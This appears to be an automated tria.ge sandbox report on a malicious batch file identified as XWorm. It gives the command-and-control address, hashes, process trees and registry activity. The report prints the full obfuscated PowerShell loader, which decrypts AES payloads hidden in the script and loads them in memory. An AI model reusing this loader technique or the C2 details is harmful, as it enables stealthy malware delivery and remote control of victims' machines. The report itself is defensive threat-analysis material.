Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
913s -
max time network
1156s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
09/11/2024, 17:28
Static task
static1
General
-
Target
ssssss.bat
-
Size
293KB
-
MD5
55045f48b34f00088c49b229bc07c30e
-
SHA1
f875cce5c12e06899b39223e040cad9f46ada1cd
-
SHA256
ad7c1c54dbc4a02faa20044c37c24478923ca1cc17989429caf059cc622eb95e
-
SHA512
549512c75fc5089cb7d4b41e3b55dde60ae253232f4ea7aed25296ebe6f16e6cc5d9fac8284240d23e060a6770514473eb29a81d5a6041ea43bf6d28f163ee7d
-
SSDEEP
3072:YIeH8waTPggAXw95luaeejSSb6wM7wXgfYM8J2Q3nfWvSYD5y6wHh9+nxMKi1/TM:gHbWAXnevGR6f2QvFIyD9+K/TvXum6
Malware Config
Extracted
xworm
149.40.62.55:60447
-
Install_directory
%AppData%
-
install_file
System User.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/448-15-0x0000021BE1F20000-0x0000021BE1F38000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 448 powershell.exe -
A potential corporate email address has been identified in the URL: A8AB776A5245B4220A490D44@AdobeOrg
-
A potential corporate email address has been identified in the URL: CF4957F555EE9B727F000101@AdobeOrg
-
A potential corporate email address has been identified in the URL: [email protected]
-
pid Process 448 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 448 powershell.exe 448 powershell.exe 2440 msedge.exe 2440 msedge.exe 4952 msedge.exe 4952 msedge.exe 3692 msedge.exe 3692 msedge.exe 1912 identity_helper.exe 1912 identity_helper.exe 1908 msedge.exe 1908 msedge.exe 1908 msedge.exe 1908 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
pid Process 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 448 powershell.exe Token: 33 3152 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3152 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe 2440 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5040 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4276 wrote to memory of 448 4276 cmd.exe 81 PID 4276 wrote to memory of 448 4276 cmd.exe 81 PID 2440 wrote to memory of 4220 2440 msedge.exe 90 PID 2440 wrote to memory of 4220 2440 msedge.exe 90 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4832 2440 msedge.exe 91 PID 2440 wrote to memory of 4952 2440 msedge.exe 92 PID 2440 wrote to memory of 4952 2440 msedge.exe 92 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93 PID 2440 wrote to memory of 1884 2440 msedge.exe 93
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ssssss.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nm1BOIVwFMg62nJj+FT46gafirK1QerzAciTsV/QolM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jX3hxWDIqv2IN+tBy0WraA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHbKp=New-Object System.IO.MemoryStream(,$param_var); $WQnGV=New-Object System.IO.MemoryStream; $ghfCO=New-Object System.IO.Compression.GZipStream($eHbKp, [IO.Compression.CompressionMode]::Decompress); $ghfCO.CopyTo($WQnGV); $ghfCO.Dispose(); $eHbKp.Dispose(); $WQnGV.Dispose(); $WQnGV.ToArray();}function execute_function($param_var,$param2_var){ $yhsic=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GuzyD=$yhsic.EntryPoint; $GuzyD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ssssss.bat';$KwMeq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ssssss.bat').Split([Environment]::NewLine);foreach ($hxuMo in $KwMeq) { if ($hxuMo.StartsWith(':: ')) { $ZEAAE=$hxuMo.Substring(3); break; }}$payloads_var=[string[]]$ZEAAE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb95473cb8,0x7ffb95473cc8,0x7ffb95473cd82⤵PID:4220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:22⤵PID:4832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:82⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:2304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵PID:1540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:12⤵PID:1680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:12⤵PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:12⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:12⤵PID:936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:12⤵PID:2272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:12⤵PID:2708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:12⤵PID:4052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:4944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:12⤵PID:444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4720 /prefetch:82⤵PID:2164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:12⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:4796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:12⤵PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:12⤵PID:4904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:12⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:12⤵PID:1548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:12⤵PID:3184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:12⤵PID:2320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2892 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1908
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4816
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4520
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004B81⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5040
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:2036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:908
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD5c47bdb673762c4ee9ecfdf321ba347b0
SHA112f230939df08ae3c0a81950d32b5af3a1c60103
SHA256e0deb4728b79a8855b9f180d5b35ab0f1751c38c50ab2ca3031017e2d0f99060
SHA512c20afb50ffea06bae42a3ad9ca878200e3c8c7045b0bc35987cf35b6219d3150ce85b85f17a2cd809ace7a5e958c37c62c1bde1af36dbb740178e7253d4b7341
-
Filesize
152B
MD5e11c77d0fa99af6b1b282a22dcb1cf4a
SHA12593a41a6a63143d837700d01aa27b1817d17a4d
SHA256d96f9bfcc81ba66db49a3385266a631899a919ed802835e6fb6b9f7759476ea0
SHA512c8f69f503ab070a758e8e3ae57945c0172ead1894fdbfa2d853e5bb976ed3817ecc8f188eefd5092481effd4ef650788c8ff9a8d9a5ee4526f090952d7c859f3
-
Filesize
152B
MD5c0a1774f8079fe496e694f35dfdcf8bc
SHA1da3b4b9fca9a3f81b6be5b0cd6dd700603d448d3
SHA256c041da0b90a5343ede7364ccf0428852103832c4efa8065a0cd1e8ce1ff181cb
SHA51260d9e87f8383fe3afa2c8935f0e5a842624bb24b03b2d8057e0da342b08df18cf70bf55e41fa3ae54f73bc40a274cf6393d79ae01f6a1784273a25fa2761728b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize4KB
MD5b11a6e8d805456b17e108a5208a410f5
SHA1d28b510cfe93b8c25656b24139b0f259e32d1c97
SHA2567d142b1eb537ca38c4c68296a2abc6f3550de0b3eba51e542ef6fb40e7fcc77b
SHA5120073f47f0aab8566a9dd52ec252fb91b285748d6e5cb6980ba38195fc2ad8798e541665f9f011ac958c2c0490f914518058b7e3593f0fcd4d2614a9c3e128be3
-
Filesize
7KB
MD58fc2342348b45caf6e008e8da00bea00
SHA152de51c574b3a93f2d4a5a0fc4a92c4ba94e8574
SHA256471001586687f108e022e7517c02c501837ac2d6c950c01cb8591a32f8856721
SHA51282c3b2ff6297c80371e584149af703782c6f65868d7c76657839860e58104c17abca974aa2e3b50bbbc831f5c964cb0cd65e0a2b8c8ec195a9df5b11d32c59cb
-
Filesize
10KB
MD5546a8392a3c47581dce4511be92b045b
SHA17a2020e9af64481725dfd06a5732f7ed1e3419d6
SHA256efc7f012f3dff14f7c530accb8df1b25612c93938547c41126e78b04cea4157c
SHA512a66c9e6da6e100d35fa81ab6acb166fb7b363175ff2feb0bcc2846126b28567ad682e330b71cb8d89a5aff12992faccad125636ab2f898bda747603b94f450ee
-
Filesize
5KB
